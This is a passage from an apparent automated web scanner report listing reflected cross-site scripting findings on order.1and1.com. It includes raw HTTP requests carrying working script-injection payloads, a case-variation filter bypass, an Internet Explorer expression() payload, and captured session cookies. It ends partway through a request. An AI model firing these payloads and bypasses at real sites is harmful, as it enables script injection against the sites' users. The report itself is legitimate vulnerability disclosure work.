Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8jK1tkKh0eGjA1Mi8vMDIxLCw=; Expires=Fri, 07-Apr-2079 21:40:31 GMT; Path=/
ETag: 6bf983c9a22ff4b8293bdd71650f2e78
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 60334


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
115F77E4A430487B74D.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hostingaf2f1</ScRiPt >54b667825a6";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload f884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 was submitted in the REST URL parameter 3. This input was returned as f884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 in a subsequent request for the URL /xml/order/Hosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Hostingf884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:46:54 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTsvN2dwNikqJiUqJyQkJScmISE=; Expires=Fri, 07-Apr-2079 21:01:01 GMT; Path=/
ETag: cda9465f5926bed8b0023a0e52b6c03c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59779


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
115F77E4A430487B74D.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hostingf884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Instant is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Instant. The payload 92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727 was submitted in the REST URL parameter 3. This input was returned as 92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727 in a subsequent request for the URL /xml/order/Instant.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Instant92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:03 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:38:10 GMT; Path=/
ETag: a59e5633696d2ae34547ee6975e60f98
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23877


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Instant";UNOUNO.params.lastpage="Instant92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/MailInstantMail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MailInstantMail. The payload 17be3</ScRiPt%20>4a6827ab2d was submitted in the REST URL parameter 3. This input was returned as 17be3</ScRiPt >4a6827ab2d in a subsequent request for the URL /xml/order/MailInstantMail.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/MailInstantMail17be3</ScRiPt%20>4a6827ab2d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:25:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:39:11 GMT; Path=/
ETag: fc23060d5be31057dc0e68ab0f04deb0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25406


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="MailInstantMail";UNOUNO.params.lastpage="MailInstantMail17be3</ScRiPt >4a6827ab2d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/MsHosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MsHosting. The payload 9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e was submitted in the REST URL parameter 3. This input was returned as 9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e in a subsequent request for the URL /xml/order/MsHosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/MsHosting9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Request 2

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:56:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=HdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUoMWFqMCMkIB8kIB4hHzA4Ly4=; Expires=Fri, 07-Apr-2079 18:10:33 GMT; Path=/
ETag: 17c5abe0f15d2a7d6b2b07c8f63d3dab
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59625


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9C6322067094898.TCpfix140a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="MsHosting";UNOUNO.params.lastpage="MsHosting9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Service is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Service. The payload 2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d was submitted in the REST URL parameter 3. This input was returned as 2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d in a subsequent request for the URL /xml/order/Service.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:52:19 GMT; Path=/
ETag: c4342f28d37068506013b97debbec70f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18491


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Service";UNOUNO.params.lastpage="Service2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
